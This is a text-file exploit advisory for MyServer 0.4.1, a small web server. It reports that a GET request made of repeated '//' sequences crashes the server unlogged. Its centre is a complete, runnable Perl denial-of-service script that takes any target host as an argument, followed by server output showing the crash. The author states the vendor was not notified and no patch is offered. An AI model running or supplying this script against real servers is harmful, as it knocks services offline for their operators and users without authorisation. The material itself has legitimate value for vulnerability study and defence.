myserver-0.4.1.txt

`  
Topic: MyServer 0.4.1 DOS  
  
Product: Myserver 0.4.1 (http://myserverweb.sourceforge.net)  
  
Note: yep, I'm on the dole, anyone wanna give me a job :)  
  
Vendor Notification: Woooops, sorry i forgot ;)  
  
  
Background:  
  
(from homepage)  
MyServer is a free and easy to configure web server. MyServer is licensed under the GNU General Public License (GPL). See the license page for additional info.  
Myserver runs under both Windows and Linux..  
Although there is allready several found flaws in Myserver, I thought that the closet bug to this was:  
http://www.securityfocus.org/bid/7770/info/  
  
but that was using excessive amounts of data.. We only need to use 20 "//" to cause a Dos condition..  
  
  
Problem Description:  
  
When Myserver is running a simple GET request can cause a Remote Denial of service, stopping the HTTP server  
alltogether..   
Also an extra note, this DOS doesn't get entered into the log file ;)   
  
Impact:  
  
Denial of service..possible code execution, haven't tested it fully yet..still finding holes ;)  
  
Patch:  
  
Nope i don't do patches.... ;)  
  
Exploit:  
----------------myserver.pl------------------------  
#!/usr/bin/perl  
  
#Myserver 0.4.1 Remote Denial of service ;)  
#oh joy...  
#deadbeat, uk2sec  
#[email protected]  
#[email protected]  
  
use IO::Socket;  
$dos = "//"x100;  
$request = "GET $dos"."HTTP/1.0\r\n\r\n";  
  
$target = $ARGV[0];  
  
print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";  
print "deadbeat, uk2sec..\n";  
print "usage: perl $0 <target>\n";  
$sox = IO::Socket::INET->new(  
Proto=>"tcp",  
PeerPort=>"80",  
PeerAddr=>"$target"  
)or die "\nCan't connect to $target..\n";  
print $sox $request;  
sleep 2;  
close $sox;  
print "Done...\n";  
------------------EOF--------------------------  
  
Looks like this from the server side:  
-------------------------  
**************************************  
************myServer 0.4.1************  
**************************************  
Initializing server configuration...  
Using english language  
Server configuration terminated  
Security access is not used, the web folder contents is accessible to anyone  
Initializing socket library...  
Socket library was initialized  
Computer name is: uk2sec-labs.no-ip.com  
IP Address #0: 192.168.0.1  
Loading MIME types...  
MIME types loaded successfully: 139  
Number of processors: 1  
Creating thread 0...  
Thread created  
Creating listening thread...  
Creating server socket...  
Server socket created  
Trying to binding port...  
Port is binded  
Trying to listen on port...  
Listen on port: 80  
Listening thread is created  
myServer is now ready to accept connections  
Press Ctrl+C to break execution  
Segmentation fault  
--------------------------  
  
Tested on: Linux (redhat 9.0)  
  
  
hello:  
bazarr, good luck out there man ;)   
  
  
regards,  
  
deadbeat  
  
----------------------------------------------------  
"no i'n i'm not blackhat, whitehat or greyhat, i   
enjoy my nice shade of green ;)"  
----------------------------------------------------  
  
`